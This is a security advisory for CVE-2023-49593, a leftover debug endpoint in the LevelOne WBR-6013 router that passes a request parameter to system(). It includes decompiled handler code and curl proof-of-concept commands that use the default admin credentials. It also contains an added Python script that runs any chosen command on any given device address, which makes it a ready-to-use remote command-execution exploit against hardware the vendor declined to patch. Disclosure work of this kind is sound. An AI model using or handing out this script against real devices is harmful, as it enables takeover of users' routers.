CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
AI Score Confidence: High
EPSS Percentile: 19.5%
CVE-2023-49593
Leftover debug code exists in the boa formSysCmd functionality of LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623. A specially crafted network request can lead to arbitrary command execution.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
WBR-6013 - <https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103>
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-489 - Leftover Debug Code
The WBR-6013 is a SOHO wireless router produced by LevelOne.
The WBR-6013 router has a web server called boa. The version used in the device comes from a Realtek SDK that uses boa. One of the SDK's APIs is /boafrm/formSysCmd. This is allegedly a debugging functionality that allows execution of arbitrary commands in the Linux system running on the device. Supposedly, this functionality was not removed prior to release, as there is no documented functionality to execute commands in the Linux system. Following is the formSysCmd function that handles the /boafrm/formSysCmd API:
void formSysCmd(void *wp)
{
    [...]
    uVar1 = get_request_param(wp,"submit-url","");
    /* "sysCmd" comes straight from the POST body */
    syscmd_ptr = (char *)get_request_param(wp,"sysCmd","");
    if (*syscmd_ptr != '\0') {
        /* the request value is placed unfiltered into a shell command line */
        sprintf(command_buff,100,"%s 2>&1 > %s",syscmd_ptr,"/tmp/syscmd.log");
        system(command_buff);
    }
    [...]
}
The sysCmd request parameter is copied into a command line and handed to system() without any validation, so an attacker able to reach this API would be able to execute arbitrary commands on the device.
Because of a CSRF protection mechanism in the web server, before a specific API can be called it is necessary to first load the HTML page that would call that API:
curl --user admin:admin http://<DEVICE_IP>/syscmd.htm &>/dev/null
After this request it is possible to use the /boafrm/formSysCmd API:
curl -d "sysCmd=reboot" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formSysCmd
After the request the device will reboot. The PoC uses the default admin credentials.
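As an added example (not code from the Talos advisory or from the vendor), the two-step sequence above written as a Python 3 script that uses only the standard library. The device address, the command and the credentials are parameters; the script assumes, as the advisory's curl commands do, that a GET of /syscmd.htm with valid HTTP Basic credentials is what satisfies the CSRF check, and it treats a missing response to the POST as expected when the command reboots the device. The function names and the argparse interface are my own.

```python
"""Two-step request sequence for the /boafrm/formSysCmd endpoint.

Added example, not code from the Talos advisory. Assumes, as the advisory's
curl commands do, that a GET of /syscmd.htm with valid HTTP Basic credentials
satisfies the server's CSRF check before the POST is accepted.
"""
import argparse
import base64
import urllib.error
import urllib.parse
import urllib.request
from typing import Dict, List, Optional, Tuple

SYSCMD_PAGE = "/syscmd.htm"        # page that must be loaded first (per advisory)
SYSCMD_API = "/boafrm/formSysCmd"  # leftover debug endpoint (CWE-489)

# (method, url, headers, body); body is None for the GET
Request = Tuple[str, str, Dict[str, str], Optional[bytes]]


def basic_auth_header(username: str, password: str) -> str:
    """Value of the Authorization header curl sends for --user user:pass."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return "Basic " + token


def build_request_sequence(device_ip: str, sys_cmd: str,
                           username: str = "admin", password: str = "admin") -> List[Request]:
    """Return, in order, the two requests the advisory's curl commands make.

    Order matters: the GET primes the CSRF state, the POST carries the command.
    sys_cmd is form-encoded unchanged; the device passes it to system() as-is.
    """
    base = f"http://{device_ip}"
    auth = {"Authorization": basic_auth_header(username, password)}
    prime: Request = ("GET", base + SYSCMD_PAGE, dict(auth), None)
    body = urllib.parse.urlencode({"sysCmd": sys_cmd}).encode("ascii")
    fire: Request = ("POST", base + SYSCMD_API,
                     {**auth, "Content-Type": "application/x-www-form-urlencoded"}, body)
    return [prime, fire]


def send_sequence(sequence: List[Request], timeout: float = 5.0) -> List[Optional[int]]:
    """Send the requests in order; return each HTTP status, or None when no
    response arrived (expected when sys_cmd reboots the device)."""
    statuses: List[Optional[int]] = []
    for method, url, headers, body in sequence:
        req = urllib.request.Request(url, data=body, headers=headers, method=method)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                statuses.append(resp.status)
        except urllib.error.HTTPError as err:   # server answered with an error code
            statuses.append(err.code)
        except OSError:                         # refused / reset / timed out
            statuses.append(None)
    return statuses


def main() -> None:
    parser = argparse.ArgumentParser(description="CVE-2023-49593 request sequence")
    parser.add_argument("device_ip")
    parser.add_argument("sys_cmd", help='command to run on the device, e.g. "reboot"')
    parser.add_argument("--user", default="admin")
    parser.add_argument("--password", default="admin")
    args = parser.parse_args()
    seq = build_request_sequence(args.device_ip, args.sys_cmd, args.user, args.password)
    for (method, url, _, _), status in zip(seq, send_sequence(seq)):
        print(f"{method} {url} -> {status if status is not None else 'no response'}")


if __name__ == "__main__":
    main()
```

Usage: `python3 syscmd_poc.py <DEVICE_IP> reboot`. Note that, per the format string in the decompiled handler, whatever the command writes to stdout lands in /tmp/syscmd.log on the device, while stderr (redirected before stdout is) stays on the web server's original stdout; nothing comes back in the HTTP response.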
LevelOne has declined to patch the issues in their software.
2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-07-08 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.